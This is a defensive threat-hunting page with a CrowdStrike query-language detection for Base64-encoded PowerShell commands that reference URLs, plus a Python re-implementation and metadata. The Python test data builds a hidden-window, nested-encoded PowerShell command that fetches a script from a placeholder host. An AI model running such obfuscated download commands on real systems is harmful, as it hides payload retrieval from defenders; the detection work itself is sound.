crowdstrike_cqlHunting

Detect and Decode Base64-Encoded PowerShell Commands - http

The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity. Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)

Detection Query

#event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
| CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
| length("CommandLine", as="cmdLength")
| groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)
// Split the command line on the encoded-command flag: index 0 is the prefix, index 1 the Base64 payload.
| EncodedString := splitString(field=CommandLine, by="-e* ", index=1)
| CmdLinePrefix := splitString(field=CommandLine, by="-e* ", index=0)
// PowerShell -EncodedCommand payloads are Base64 over UTF-16LE, not UTF-8.
| DecodedString := base64Decode(EncodedString, charset="UTF-16LE")
// Look for encoded messages in the decoded message and decode those too.
| case {
  DecodedString = /encoded/i
  | SubEncodedString := splitString(field=DecodedString, by="-EncodedCommand ", index=1)
  | SubCmdLinePrefix := splitString(field=DecodedString, by="-EncodedCommand ", index=0)
  | SubDecodedString := base64Decode(SubEncodedString, charset="UTF-16LE");
  *
}
// Keep only results whose decoded payload (outer or nested) references an http(s) URL.
| DecodedString=/.*https?\:\/\/.*/ or SubDecodedString=/.*https?\:\/\/.*/
| table([executionCount, uniqueEndpointCount, DecodedString, SubDecodedString, CommandLine])
| sort(executionCount, order=desc)
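To see what the pipeline above computes on concrete events, here is an added Python re-implementation (example code, not CrowdStrike's query or tooling): it applies the same flag spellings, decodes the UTF-16LE Base64 argument, follows nested -EncodedCommand payloads, groups by CommandLine with executionCount and uniqueEndpointCount, and keeps only decoded content containing an http(s) URL. The event dicts, aid values and command lines are constructed samples, and the helper names (`encode_ps`, `decode_encoded_command`, `hunt`) are this example's own.

```python
import base64
import re
from collections import defaultdict

# Same flag spellings as the query's CommandLine filter; group 1 is the Base64 argument.
FLAG_RE = re.compile(r"\s-(?:e|enc|encoded|encodedcommand)\s+(\S+)", re.IGNORECASE)
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def encode_ps(script):  # builds a -EncodedCommand argument (UTF-16LE, then Base64) for samples
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline, max_depth=3):
    # Decode the argument after -e/-enc/-EncodedCommand as UTF-16LE, then follow nested
    # encodings found in the decoded text (the query's case{} block does one level).
    decoded, current = None, cmdline
    for _ in range(max_depth):
        m = FLAG_RE.search(current)
        if not m:
            break
        try:
            decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            break  # not valid Base64/UTF-16LE: keep whatever was decoded so far
        current = decoded
    return decoded

def hunt(events):
    # Mirrors the query over ProcessRollup2-like dicts (aid, ImageFileName, CommandLine):
    # groupby(CommandLine), decode, keep payloads containing http(s)://, sort by executionCount.
    groups = defaultdict(lambda: {"aids": set(), "executionCount": 0})
    for ev in events:
        if not ev["ImageFileName"].lower().endswith("\\powershell.exe") or not FLAG_RE.search(ev["CommandLine"]):
            continue
        g = groups[ev["CommandLine"]]
        g["aids"].add(ev["aid"])
        g["executionCount"] += 1
    rows = []
    for cmd, g in groups.items():
        decoded = decode_encoded_command(cmd)
        if decoded and URL_RE.search(decoded):
            rows.append({"executionCount": g["executionCount"], "uniqueEndpointCount": len(g["aids"]),
                         "DecodedString": decoded, "CommandLine": cmd})
    return sorted(rows, key=lambda r: r["executionCount"], reverse=True)

# Constructed sample events (not real telemetry): a nested-encoded download and a benign encoded command.
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
INNER = encode_ps("Invoke-WebRequest -Uri http://example.invalid/update.ps1")
NESTED = "powershell.exe -nop -w hidden -enc " + encode_ps("powershell -EncodedCommand " + INNER)
BENIGN = "powershell.exe -e " + encode_ps("Get-Date")
SAMPLE_EVENTS = [{"aid": a, "ImageFileName": PS, "CommandLine": c}
                 for a, c in [("aid-1", NESTED), ("aid-2", NESTED), ("aid-1", NESTED), ("aid-3", BENIGN)]]
```

Running `hunt(SAMPLE_EVENTS)` yields a single row for the nested command (executionCount 3, uniqueEndpointCount 2) with the fully decoded Invoke-WebRequest line, while the encoded Get-Date command is decoded but dropped by the URL filter, exactly as the CQL would do.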

Author

CrowdStrike

Data Sources

Endpoint

Platforms

windows

Tags

Hunting, cs_module:Insight
Raw Content
# --- Query Metadata ---
# Human-readable name for the query. Will be displayed as the title.
name: Detect and Decode Base64-Encoded PowerShell Commands - http


# Description of what the query does and its purpose.
description: The query identifies Windows PowerShell executions using encoded commands, extracts and decodes Base64 payloads (including nested encodings), counts occurrences and unique hosts, and outputs decoded command content for analysis of potentially obfuscated activity.

# The author or team that created the query.
author: CrowdStrike

# The required log sources to run this query successfully in Next-Gen SIEM.
# This will be displayed in the UI to inform the user.
log_sources:
  - Endpoint

# The CrowdStrike modules required to run this query.
cs_required_modules:
  - Insight

# Tags for filtering and categorization.
# Include relevant techniques, tactics, or platforms.
tags:
  - Hunting

# --- Query Content ---
# The actual CrowdStrike Query Language (CQL) code.
# Using the YAML block scalar `|` allows for multi-line strings.
cql: |
  #event_simpleName=ProcessRollup2 event_platform=Win ImageFileName=/.*\\powershell\.exe/
  | CommandLine=/.*\s+\-(e|encoded|encodedcommand|enc)\s+.*/
  | length("CommandLine", as="cmdLength")
  | groupby([CommandLine], function=stats([count(aid, distinct=true, as="uniqueEndpointCount"), count(aid, as="executionCount")]), limit=max)
  // Split the command line on the encoded-command flag: index 0 is the prefix, index 1 the Base64 payload.
  | EncodedString := splitString(field=CommandLine, by="-e* ", index=1)
  | CmdLinePrefix := splitString(field=CommandLine, by="-e* ", index=0)
  // PowerShell -EncodedCommand payloads are Base64 over UTF-16LE, not UTF-8.
  | DecodedString := base64Decode(EncodedString, charset="UTF-16LE")
  // Look for encoded messages in the decoded message and decode those too.
  | case {
    DecodedString = /encoded/i
    | SubEncodedString := splitString(field=DecodedString, by="-EncodedCommand ", index=1)
    | SubCmdLinePrefix := splitString(field=DecodedString, by="-EncodedCommand ", index=0)
    | SubDecodedString := base64Decode(SubEncodedString, charset="UTF-16LE");
    *
  }
  // Keep only results whose decoded payload (outer or nested) references an http(s) URL.
  | DecodedString=/.*https?\:\/\/.*/ or SubDecodedString=/.*https?\:\/\/.*/
  | table([executionCount, uniqueEndpointCount, DecodedString, SubDecodedString, CommandLine])
  | sort(executionCount, order=desc)

# Explanation of the query.
# Using the YAML block scalar `|` allows for multi-line strings.
# Uses markdown for formatting on the webpage.
explanation: |
  Reference: [GitHub CrowdStrike/logscale-community](https://github.com/CrowdStrike/logscale-community-content/blob/main/Queries-Only/Helpful-CQL-Queries/Decode%20Base64.md)